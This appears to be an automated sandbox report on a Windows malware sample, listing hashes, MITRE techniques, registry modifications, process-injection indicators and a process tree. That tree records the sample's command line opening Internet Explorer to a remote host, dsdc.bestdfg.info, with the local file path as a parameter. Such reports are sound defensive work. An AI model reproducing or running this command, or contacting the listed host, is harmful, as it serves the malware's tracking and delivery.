7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628

Analysis

max time kernel
112s
max time network
160s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
19/09/2022, 06:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe
Size

106KB
MD5

eb924181cc26ea4bf4e9b6e367085f60
SHA1

88e329693c1f1536a00ae6df3e2820483c408408
SHA256

7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628
SHA512

a2b15d724e6cbc8fa05787d61514764bb240dc9bdb17779b4b3939588978a537e148bb23e328766acd0514c459792bf0ece81dd3aa39d8bc9c7f08a2d0ac3284
SSDEEP

3072:xZMJnTeM4cJJLILa77j2NZmOSyt+DDMuzWtVhUxxW:/eTeM/vILI8Z2yQ/MGWcxc

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe

Loads dropped DLL 13 IoCs

pid	Process
3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe
3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe
3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe
3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe
3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe
3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe
3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe
3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe
3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe
3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe
3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe
3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe
3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3064 set thread context of 1316	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	115

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90d39f5019ccd801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30985241"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff680000001a000000ee0400007f020000	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1767816070"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b1421600000000020000000000106600000001000020000000789e3c0671d13c6cd58a53c593939c6c95f800f1b5c9381e1734531c308f414b000000000e8000000002000020000000b21309f149e80ec461970831d1be60564b670284fe624f218940f3ac724a623720000000ed13850cc048afedc44ce0b442a6d8b862c28a8a34271d2a273553f1cc6176c34000000059f68ef2ef72bb9793dfc22baa8067f159476578b2fd8887220d29041c6c9de9de6d0f1d6af6b13318eb85994b3147d867f87bd2985ebbc0d5c5c5d1f9591182	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30985241"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30985241"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a020054d19ccd801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b1421600000000020000000000106600000001000020000000f7821166d0464ba514529296b2f1247419a06d3623c657f4a600cdec48c25170000000000e800000000200002000000026286fcfa51f23ceacb9a926a0fd06c09069bc0149bdbb7147e520f452a2b1f820000000740cae33ffbebb31dab117d42ff421ab13869e29c020f76b8cd0198ce3ba347b4000000067658a78d61e59f4b4116863fb5073600016ac9e78cfcd3277c7ee1ab97be092b425e93d620baf1373f66dc9d82e7c23c37bd0293f49139682045cf5b0b7883d	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b1421600000000020000000000106600000001000020000000dac238b0d4a92a08ead11e0cd2ba3442f636d7100edd37de2410eda664ac6946000000000e8000000002000020000000d2d1df314251dd470a73ba7c7dda1fb3e149c96c9060bf20b928b68b82dfcc54200000005e9aec9d8d6a1e5c47bbecf12c66e4b5112afbeaa2fd9051c5d46a1df19c17a540000000a2b333be2c74ade367087b288114a192a3c0dbda53ee7ed9e31ac014d1448972aa90867a6f65bef4d0bf3500c38ce773a3c5004d2f946a506ae1e89b418bbc74	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1767816070"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff4e00000000000000d404000065020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30985241"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{8154E5C2-380C-11ED-B696-F22D08015D11} = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b14216000000000200000000001066000000010000200000009fbad2f17d7fb5d59d65b3d0850c7d8291f3d9cfd23d2c4f3ee2ed13bbc7d697000000000e80000000020000200000009c20309b97a93bd3cfdb5a9568dfefd8d19d8bec9ff10dee67877be6338f16e5200000001112528aa69abe47bbb507510f5a41ae0f3ac2e4bac1f15b390a2861aa88504340000000307d9cd9cfff8b49f8b4ff0fe7fb6555a856190e4e2403c2858143fd1f8438d3b01a9cf9749c873cf875642566b4c4b9c990566ecabd50f6457b87b669260a06	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3400000034000000ba04000099020000	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1767816070"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b14216000000000200000000001066000000010000200000007d7036e9eb8a15cf8345dc31057b7e546da35ba346e8ed148cc9ab01c4871a9d000000000e800000000200002000000073a8592ad673eba1c2a76dfd851dc0ffca16f0a3cc3ae1e3436f041be97c6d29200000002996b30250a19ced61b0027b45ce28e4991073c6979d56fce4453f3f8b9be5e64000000065d46e66ce2f2b502a2a49ae59acab2b51e149dbace3a55a8dd48805b9bdec9dbc0f25815233c078afa9766498437b9119f7e2553c5828b07a17ed01b666e4bc	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a02e2c5419ccd801	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1767816070"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b142160000000002000000000010660000000100002000000096d671aea5b265d107f18751b7fd74622ddec32deee23ca8efc82dbbb8618411000000000e8000000002000020000000568825ddc5cd6cb17bcb1f45357184df5c5cccb061f4360f74f132fad5e88a602000000007b7cc38fc80f9d46ebdf7e984839af2805278b7ddbe3c566bc5f265cbe6ba3d400000000ba42a547f4feb83a32cba69269fe644ac0625897d997f5a759f9fe7ff8d6355af89b7929fa29fe908a7342bfe04e10136545eeb9875811bd0344655fd219525	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 1097695219ccd801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b14216000000000200000000001066000000010000200000005fab3a0b0410cd7ffa2f420e087296d0f94f9a671656f8eaa7a877d49770ec31000000000e8000000002000020000000ffa2c39d48d2e307c9912463efd60a498028e7a527eac52cb69647ad4bfaa70720000000b458925de9bbb0a87723a307286b01a70e40cf51f74e80443f77a67b02f76fcb400000003867599dc669a92b53690ab0a7341272b6212f581fae5e71b0e111faacc38e327744c210c9b8caa653c725083c8f927013fceeb0a772bf74c7280272a139c5bd	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30985241"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1767816070"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b1421600000000020000000000106600000001000020000000e7ef5b9553c420538c94a0f1b3aa916be8126df736305c9efd9a338fed9c32b7000000000e8000000002000020000000dfd6afd339ca86ce1abe24dcc348aae27e5d664ed04576d18591bd0301fe745020000000261380769b10a07b59de519adfbd63d49ca98f8b4ba72787272ad1bfe0f5b349400000006222e2682bec5c08c8b20060cb7855cc296df37d565ebacdf062d4e8fe9d092ec63d6178f085537112422b812c17dc5d9643042850d0be773ec1f441c66ace1e	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff720000001a000000f80400007f020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE

Suspicious use of FindShellTrayWindow 12 IoCs

pid	Process
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
3728	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 50 IoCs

pid	Process
3728	IEXPLORE.EXE
3728	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
1276	IEXPLORE.EXE
1276	IEXPLORE.EXE
5084	IEXPLORE.EXE
5084	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
4752	IEXPLORE.EXE
4752	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
4596	IEXPLORE.EXE
4596	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
4752	IEXPLORE.EXE
4752	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
4756	IEXPLORE.EXE
4756	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
4164	IEXPLORE.EXE
4164	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
4596	IEXPLORE.EXE
4596	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
4908	IEXPLORE.EXE
4908	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
4756	IEXPLORE.EXE
4756	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
4164	IEXPLORE.EXE
4164	IEXPLORE.EXE
3716	IEXPLORE.EXE
3716	IEXPLORE.EXE
4880	IEXPLORE.EXE
4880	IEXPLORE.EXE
4880	IEXPLORE.EXE
4880	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3064 wrote to memory of 1104	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	80
PID 3064 wrote to memory of 1104	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	80
PID 3064 wrote to memory of 1104	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	80
PID 1104 wrote to memory of 3728	1104	iexplore.exe	81
PID 1104 wrote to memory of 3728	1104	iexplore.exe	81
PID 3064 wrote to memory of 3212	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	82
PID 3064 wrote to memory of 3212	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	82
PID 3064 wrote to memory of 3212	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	82
PID 3212 wrote to memory of 3716	3212	iexplore.exe	83
PID 3212 wrote to memory of 3716	3212	iexplore.exe	83
PID 3728 wrote to memory of 5084	3728	IEXPLORE.EXE	85
PID 3728 wrote to memory of 5084	3728	IEXPLORE.EXE	85
PID 3728 wrote to memory of 5084	3728	IEXPLORE.EXE	85
PID 3716 wrote to memory of 1276	3716	IEXPLORE.EXE	84
PID 3716 wrote to memory of 1276	3716	IEXPLORE.EXE	84
PID 3716 wrote to memory of 1276	3716	IEXPLORE.EXE	84
PID 3064 wrote to memory of 4388	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	86
PID 3064 wrote to memory of 4388	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	86
PID 3064 wrote to memory of 4388	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	86
PID 4388 wrote to memory of 368	4388	iexplore.exe	87
PID 4388 wrote to memory of 368	4388	iexplore.exe	87
PID 3716 wrote to memory of 4752	3716	IEXPLORE.EXE	88
PID 3716 wrote to memory of 4752	3716	IEXPLORE.EXE	88
PID 3716 wrote to memory of 4752	3716	IEXPLORE.EXE	88
PID 3064 wrote to memory of 4452	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	89
PID 3064 wrote to memory of 4452	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	89
PID 3064 wrote to memory of 4452	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	89
PID 4452 wrote to memory of 1864	4452	iexplore.exe	90
PID 4452 wrote to memory of 1864	4452	iexplore.exe	90
PID 3716 wrote to memory of 4596	3716	IEXPLORE.EXE	91
PID 3716 wrote to memory of 4596	3716	IEXPLORE.EXE	91
PID 3716 wrote to memory of 4596	3716	IEXPLORE.EXE	91
PID 3064 wrote to memory of 3740	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	95
PID 3064 wrote to memory of 3740	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	95
PID 3064 wrote to memory of 3740	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	95
PID 3740 wrote to memory of 1884	3740	iexplore.exe	96
PID 3740 wrote to memory of 1884	3740	iexplore.exe	96
PID 3064 wrote to memory of 3388	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	97
PID 3064 wrote to memory of 3388	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	97
PID 3064 wrote to memory of 3388	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	97
PID 3388 wrote to memory of 4856	3388	iexplore.exe	98
PID 3388 wrote to memory of 4856	3388	iexplore.exe	98
PID 3716 wrote to memory of 4756	3716	IEXPLORE.EXE	99
PID 3716 wrote to memory of 4756	3716	IEXPLORE.EXE	99
PID 3716 wrote to memory of 4756	3716	IEXPLORE.EXE	99
PID 3064 wrote to memory of 2944	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	100
PID 3064 wrote to memory of 2944	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	100
PID 3064 wrote to memory of 2944	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	100
PID 2944 wrote to memory of 448	2944	iexplore.exe	101
PID 2944 wrote to memory of 448	2944	iexplore.exe	101
PID 3716 wrote to memory of 4164	3716	IEXPLORE.EXE	102
PID 3716 wrote to memory of 4164	3716	IEXPLORE.EXE	102
PID 3716 wrote to memory of 4164	3716	IEXPLORE.EXE	102
PID 3064 wrote to memory of 4728	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	103
PID 3064 wrote to memory of 4728	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	103
PID 3064 wrote to memory of 4728	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	103
PID 4728 wrote to memory of 4340	4728	iexplore.exe	104
PID 4728 wrote to memory of 4340	4728	iexplore.exe	104
PID 3064 wrote to memory of 3952	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	105
PID 3064 wrote to memory of 3952	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	105
PID 3064 wrote to memory of 3952	3064	7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe	105
PID 3952 wrote to memory of 4092	3952	iexplore.exe	106
PID 3952 wrote to memory of 4092	3952	iexplore.exe	106
PID 3716 wrote to memory of 4908	3716	IEXPLORE.EXE	107

C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe
"C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3064
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://dsdc.bestdfg.info:251/?t=919&i=ie&d8b27608ecd4b72d52ed7ab31a7a63916e0bce87=d8b27608ecd4b72d52ed7ab31a7a63916e0bce87&uu=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce87
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1104
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://dsdc.bestdfg.info:251/?t=919&i=ie&d8b27608ecd4b72d52ed7ab31a7a63916e0bce87=d8b27608ecd4b72d52ed7ab31a7a63916e0bce87&uu=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce87
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3728
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3728 CREDAT:17410 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:5084
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
